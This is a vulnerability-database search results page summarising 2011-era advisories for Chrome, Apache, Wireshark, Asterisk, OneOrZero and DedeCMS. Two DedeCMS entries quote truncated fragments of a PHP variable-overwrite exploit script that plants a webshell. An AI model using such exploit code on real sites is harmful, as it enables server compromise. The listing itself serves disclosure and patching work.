9563 matches found
Google Chrome < 15.0.874.120 Multiple Vulnerabilities
The version of Google Chrome installed on the remote host is earlier than 15.0.874.120. It is, therefore, potentially affected by the following vulnerabilities: - A double-free error exists in the Theora decoder. (CVE-2011-3892) - Out-of-bounds read errors exist in the MKV and Vorbis media handler...
CVE-2011-4415
The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL...
[PT-2011-20] Authorization bypass vulnerability in OneOrZero AIMS
PT-2011-20 Positive Technologies Security Advisory: Authorization bypass vulnerability in OneOrZero AIMS. Vulnerable software: OneOrZero AIMS, Version: 2.7....
DEBIAN-CVE-2011-4100
The csnStreamDissector function in epan/dissectors/packet-csn1.c in the CSN.1 dissector in Wireshark 1.6.x before 1.6.3 does not initialize a certain variable, which allows remote attackers to cause a denial of service (application crash) via a malformed packet...
SQL injection
SQL injection vulnerability in lib/oozaccess.php in OneOrZero Action & Information Management System (AIMS) 2.7.0 allows remote attackers to execute arbitrary SQL commands via the cookieName variable...
Dede GetWebShell 0Day vulnerability analysis report-vulnerability warning-the black bar safety net
Recently a large number of websites have been compromised. After research and analysis by the security Bao-wide laboratory, these sites were found to be running DedeCMS, in which a very serious vulnerability has been disclosed: an attacker can write a "word Trojan" directly to the server. The DedeCMS vulnerability is mainly due t...
CVE-2011-3628
Untrusted search path vulnerability in pam_motd (aka the MOTD module) in libpam-modules before 1.1.3-2ubuntu2.1 on Ubuntu 11.10, before 1.1.2-2ubuntu8.4 on Ubuntu 11.04, before 1.1.1-4ubuntu2.4 on Ubuntu 10.10, before 1.1.1-2ubuntu5.4 on Ubuntu 10.04 LTS, and before 0.99.7.1-5ubuntu6.5 on Ubuntu 8.0...
AST-2011-012: Remote crash vulnerability in SIP channel driver
Asterisk Project Security Advisory - AST-2011-012. Product: Asterisk. Summary: Remote crash vulnerability in SIP channel driver. Nature of Advisory: Remote crash. Susceptibility: Remote authenticated sessions. Severity: Critical. Exploits Known: No. Reported On: October 4, 2011. Reported By: Ehsan Foroughi. Poste...
Dedecms variable coverage vulnerability Exploit-vulnerability warning-the black bar safety net
Title: Dedecms variable coverage vulnerability Exploit. Time: 2011-09-06. Team: MakeBug. Author: cfKing...
CVE-2009-5103
Cross-site scripting (XSS) vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...
Cross site scripting
Cross-site scripting (XSS) vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...
DEDECMS full version gotopage variable XSS ROOTKITS, 0DAY-vulnerability warning-the black bar safety net
Affected versions: DEDECMS full version. Vulnerability description: the gotopage variable in the DEDECMS back-end login template is not validated on input, leading to an XSS vulnerability. \dede\templets\login.htm, around line 65: input type="hidden" name="gotopage" value="? php if!...
asterisk -- remote crash vulnerability in SIP channel driver
Asterisk project reports: A remote authenticated user can cause a crash with a malformed request due to an uninitialized variable...
Code injection
Array index error in GroupWise Internet Agent (GWIA) in Novell GroupWise 8.0 before HP3 allows remote attackers to execute arbitrary code via a crafted yearly RRULE variable in a VCALENDAR attachment in an e-mail message...
Wireshark Multiple Denial of Service Vulnerabilities - Windows
Wireshark is prone to multiple denial of service vulnerabilities.
DeDeCMS(weaving dreams)variable overwrite 0day getshell-a vulnerability warning-the black bar safety net
#!/usr/bin/php -w <?php error_reporting(E_ERROR); set_time_limit(0); print_r(' DEDEcms Variable Coverage Exploit Author: www.heixiaozi.com www.webvul.com '); echo "\r\n"; if ($argv[2] == null) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' url aid path aid...
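DeDeCMS (织梦) variable overwrite (CVE-2015-4553)
Brief description: 1. Affected versions: DEDECMS 5.7, 5.6, 5.5. 2. Vulnerable file: /include/common.inc.php 3. The global variable initialization in DEDECMS is flawed, allowing any global variable to be overwritten. Impact: 1. An attacker can use this vulnerability to redefine the database connection. 2. The vulnerability can be used for various unauthorized operations and to construct an exploit that writes a webshell backdoor directly. !usr/bin/php -w 12 echo " Exploit Success \n"; if$aid==1echo " Shell:".$url."/$path/data/cache/fuck.php\n" ; if$aid==2echo "...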
CentOS 5 : bash (CESA-2011:1073)
An updated bash package that fixes one security issue, several bugs, and adds one enhancement is now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having low security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives...
CentOS Update for bash CESA-2011:1073 centos5 i386
Check for the version of bash. OpenVAS Vulnerability Test: CentOS Update for bash CESA-2011:1073 centos5 i386. Authors: System Generated Check.